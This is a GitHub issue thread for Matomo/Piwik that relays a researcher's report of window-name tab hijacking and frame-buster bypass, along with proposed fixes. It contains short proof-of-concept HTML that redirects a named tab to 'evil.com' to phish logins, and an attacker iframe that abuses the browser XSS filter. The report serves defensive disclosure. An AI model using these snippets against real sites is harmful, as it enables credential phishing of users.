Add window.name= %buster% to prevent UI redressing #2966

Open
mattab opened this issue Feb 22, 2012 · 4 comments
Labels
c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change.

Comments

mattab (Member) commented Feb 22, 2012

This is a best practise/non critical issue, which was reported by Marcus Niemietz, a Web security researcher at the Ruhr-University Bochum in Germany.

See the attached video for a demo of the hack. It requires a bit of user interaction.

Proof of Concept:
--------------------
<a
  target="public_handle"
  href="http://www.example.org">
    Example.org
</a>
<a
  href="#"
  onclick="window.open('//evil.com', 'public_handle'); return false;">
    Example.org
</a>

By clicking on the first link (which is on attackers.org), a window/tab
will be opened with the name "public_handle" and the address
"example.org". Thus, there are for example two tabs: One from the
attacker where the above code is (attackers.org), the other with the
Piwik installation (example.org). After clicking on the "example.org"
tab, the user will click on the tab of the attacker - for e.g. social
engineering reasons. By clicking on the second link, "evil.com" will be
opened in the tab with the name "public_handle"; therefore,
the tab with "example.org" will change the address to "evil.com". The
user is looking at this tab now (with the name "public_handle") and
thinks: "Hey, I'm logged out. I will type in my username and
password." - but this is actually the web page of the attacker.

You can use such a line of JavaScript code to fix this issue:
<script type="text/javascript">window.name="%TOKEN%";</script>

%TOKEN% should be a server-side randomly generated string. By using
this, an attacker cannot guess the name of the window. Furthermore, a
name specified by the attacker will be overwritten.

[...]

Beside that there is another thing that you can implement:
<script type="text/javascript">document.designMode='off';</script>

You can find more information about it in my paper
(http://ui-redressing.mniemietz.de/uiRedressing.pdf) on the pages 33
and 34. It can be used to deactivate (no frame buster will work) and
(not documented) inject JavaScript code.

mattab (Member, Author) commented Feb 22, 2012

Attachment: demo of non critical issue
piwik.avi

robocoder (Contributor) commented:

Maybe stick these js snippets into the iframe buster body template?

mattab (Member, Author) commented Feb 27, 2012

Another note from Marcus:

You should add the HTTP header "X-Xss-Protection: 0" to disable the XSS
filters of IE and Chrome. They can be used to deactivate e.g. a
frame-buster in the following way:

victim.html:
---
<script type="text/javascript">
  if (parent.frames.length > 0){
    top.location.replace(document.location);
  }
</script>

attacker.html:
---
<iframe src="http://www.example.org/?xyz=%3Cscript%20type=%22
text/javascript%22%3Eif">
</iframe>

The same strategy can be used to deactivate "window.name" or
"designMode". Thus, you should add this header to gain better
security.

mattab (Member, Author) commented Dec 14, 2012

If someone can submit a patch that would be appreciated.

@mattab mattab added this to the Future releases milestone Jul 8, 2014
@mattab mattab removed the P: normal label Aug 3, 2014
@mattab mattab modified the milestones: Long term, Mid term Dec 23, 2015
@mattab mattab modified the milestones: Long term, Mid term Dec 5, 2016